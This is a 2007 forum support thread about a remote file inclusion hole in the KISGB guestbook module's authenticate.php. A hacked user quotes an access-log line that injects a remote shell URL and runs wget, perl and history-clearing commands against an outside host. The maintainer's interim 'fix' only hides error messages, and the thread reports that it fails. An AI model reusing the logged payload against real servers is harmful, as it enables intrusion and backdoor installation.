Authenticate.php exploit?

zhanna · New Member Joined: Jul 19, 2007 Posts: 6

Hi,

This morning I was informed by my web host of an exploit dealing with the authenticate.php script. They removed it from my account. Has there been a fix for this? I can't seem to find anything. I would love to keep using KISGB if at all possible.

Thanks,
Zhanna

Raven · Posted: Fri Jul 20, 2007 8:14 am

Yes there is - I haven't published it yet because I am still testing it. It should be soon.

Raven · Posted: Fri Jul 20, 2007 6:28 pm

Modify your config.php file

Towards the top of config.php you will see this section:
##################################################
# Message Editing Settings #
##################################################

Add this line of code right BEFORE so it is the last setting in the Path and Security section:
$hide_errors = TRUE;

Then, at the bottom of config.php you will see this section:
######### DO NOT EDIT BELOW THIS LINE!! ##########
if (@file_exists($path_to_user_prefs)&&$use_userprefs) @include($path_to_user_prefs);

Add this line right after:
if (isset($hide_errors) AND $hide_errors) @ini_set('display_errors','off');

This will mask the error message that reveals the exploit. There is more code to fully fix the code but this will render the exploit useless.

zhanna · New Member Joined: Jul 19, 2007 Posts: 6

Thanks! Will try this as soon as I can, hoping it will be good enough to satisfy my web host until the complete fix is ready.

Zhanna

steeve971 · New Member Joined: Jan 04, 2007 Posts: 5

Hi !

Your solution doesn't work ! Sad

My website was hacked by your script. Here is the log file :

19/Oct/2007:12:44:39 +0200] "GET /modules/kisgb-nuke/authenticate.php?default_path_for_themes=http://fr0x3rs.interfree.it/CmD/math1.php?&cmd=cd%20/tmp;wget%20http://fr0x3rs.interfree.it/s01.txt;perl%20s01.txt;rm%20s01.txt;unset;history%20-c HTTP/1.1" 200 1760 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
host56-235-static.53-82-b.business.telecomitalia.it -

Before this, I added these code but they don't work !
$hide_errors = TRUE;
if (isset($hide_errors) AND $hide_errors) @ini_set('display_errors','off');

Do you have any other solution ???
the hackers add a file named "backd00r.c" on the module root directory ! Go to google with this keyword "backd00r.c" and you'll see... Sad

Thank you for your answer...

--------
##################################################
# phpNuke Settings #
##################################################
$index = 1;
$hide_errors = TRUE;
##################################################
# Message Editing Settings #
##################################################
$allow_msg_lvl_edit_by_admin = false;
$allow_msg_lvl_edit_by_user = false;

et... AND...

######### DO NOT EDIT BELOW THIS LINE!! ##########
if (file_exists($path_to_user_prefs)&&$use_userprefs) @include($path_to_user_prefs);
if (isset($hide_errors) AND $hide_errors) @ini_set('display_errors','off');
$version = $app_version;
?>

Raven · Posted: Sat Oct 20, 2007 11:54 am

I have a "not fully tested" new version of KISGB that corrects all of this, at least I and the other testers haven't been able to break it. I will ready it for release (hopefully) w/i the next hour or so. I apologize for these issues and my health has not been good the past year or I would have had this released.

Raven · Posted: Sat Oct 20, 2007 4:30 pm

I have sent you an email with a d/l link for v5.2.0. Please grab a copy and install it. Please test it thoroughly and let me know just asap if it is now working corectly.

steeve971 · New Member Joined: Jan 04, 2007 Posts: 5

Thank you very much for your quick answer !

In fact, the previous version was very dangerous. My web host put down my website !

I'll try this new version asap and let you know !

Thanks again !

Raven · Posted: Tue Oct 23, 2007 7:29 am

What have you found in your testing? I really need to release this. Thanks!